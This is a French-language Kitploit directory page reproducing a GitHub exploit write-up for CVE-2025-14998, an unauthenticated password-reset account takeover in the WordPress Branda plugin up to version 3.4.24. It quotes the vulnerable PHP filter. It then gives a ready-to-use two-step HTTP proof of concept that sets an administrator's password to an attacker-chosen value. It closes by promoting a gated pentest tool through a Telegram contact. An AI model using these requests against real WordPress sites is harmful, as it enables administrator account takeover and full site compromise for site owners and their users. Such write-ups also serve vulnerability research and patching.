Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14998 — CVE-2025-14998 Plugin WordPress - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Élévation de privilèges non authentifiée via prise de contrôle de compte | Kitploit
Outils/GitHubGitHub/ktn1990/cve-2025-14998
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 Plugin WordPress - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Élévation de privilèges non authentifiée via prise de contrôle de compte

Voir le dépôt
22il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Wordpress Branda – Marque blanche et image de marque, Personnalisateur gratuit de page de connexion <= 3.4.24 - Escalade de privilèges non authentifiée via prise de contrôle de compte

CVE-2025-14998 Le plugin Branda pour WordPress est vulnérable à une escalade de privilèges via prise de contrôle de compte dans toutes les versions jusqu'à la 3.4.24 incluse. Cela est dû au fait que le plugin ne valide pas correctement l'identité d'un utilisateur avant de mettre à jour son mot de passe. Cela permet à des attaquants non authentifiés de modifier les mots de passe d'utilisateurs arbitraires, y compris les administrateurs, et de s'en servir pour accéder à leur compte.

Pour plus de vulnérabilités WordPress et d'outils de pentest exclusifs, contactez-moi sur Telegram @KtN1990.

🔍 Analyse de la cause racine

Le plugin remplace la logique de génération de mot de passe de WordPress en se raccrochant au filtre random_password. Au lieu de permettre à WordPress de générer un mot de passe aléatoire sécurisé, le plugin le remplace par une entrée contrôlée par l'utilisateur.

Code vulnérable

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 Preuve de concept (nettoyée)

Étape 1 — Déclencher la réinitialisation de mot de passe avec un mot de passe arbitraire

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

La valeur de password_1 peut être n'importe quelle chaîne contrôlée par l'attaquant.


Étape 2 — Terminer la réinitialisation en utilisant la même valeur que la clé de réinitialisation

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ Résultat

  • WordPress accepte le mot de passe contrôlé par l'attaquant
  • Le mot de passe de l'administrateur est modifié
  • L'attaquant peut s'authentifier en tant qu'utilisateur affecté

Aucun accès aux e-mails ou jeton de réinitialisation de mot de passe valide n'est requis.


💥 Impact

Un attaquant non authentifié peut :

  • Réinitialiser les mots de passe de tout utilisateur WordPress
  • Prendre le contrôle des comptes administrateur
  • Obtenir le contrôle total de l'installation WordPress
  • Modifier des plugins, thèmes ou contenu

Contact

  • @KtN1990

Plus de vulnérabilités, découvrez Megatron !

Logo

  • 💣 Qu'est-ce que Megatron ? Megatron est un outil avancé de tests de pénétration conçu pour les testeurs sérieux et les red teamers. Que vous auditiez, scanniez ou testiez des infrastructures, Megatron vous donne la puissance dont vous avez besoin.

-🛡️ Idéal pour : – Chercheurs en sécurité – Testeurs de pénétration – Hackers éthiques

  • 📦 Ligne maintenue avec ~230 modules de recherche hérités ; améliorations récentes du cœur du scanner pour la stabilité et la détection.

  • 🎯 Objectif : Fourni strictement pour les tests de sécurité autorisés, l'éducation, la recherche défensive et la formation d'équipe rouge. Cette version n'est pas destinée à un usage illégal. La distribution est contrôlée — accès uniquement après vérification et signature d'un accord d'utilisation responsable / NDA.

-🛡 Politique d'accès responsable (résumé) :

  1. Accès réservé aux professionnels de la sécurité vérifiés, aux équipes de sécurité d'entreprise, aux laboratoires accrédités ou aux fournisseurs de formation.
  2. Vous devez fournir le nom de l'organisation, le rôle, l'email officiel (professionnel) et un but licite.
  3. Téléchargement complet accordé uniquement après vérification et signature de notre Accord d'utilisation responsable / NDA.
  4. Tolérance zéro pour les abus — toute preuve d'utilisation malveillante entraîne la révocation et un signalement si nécessaire.
  • 📩 Contact / Demandes / Vérification : @KtN1990 — inclure l'organisation, le rôle et une brève raison d'accès. Chaîne Telegram

Démo

TEXTE ALTERNATIF DE L'IMAGE ICI

Licence

MIT

Télécharger l’outil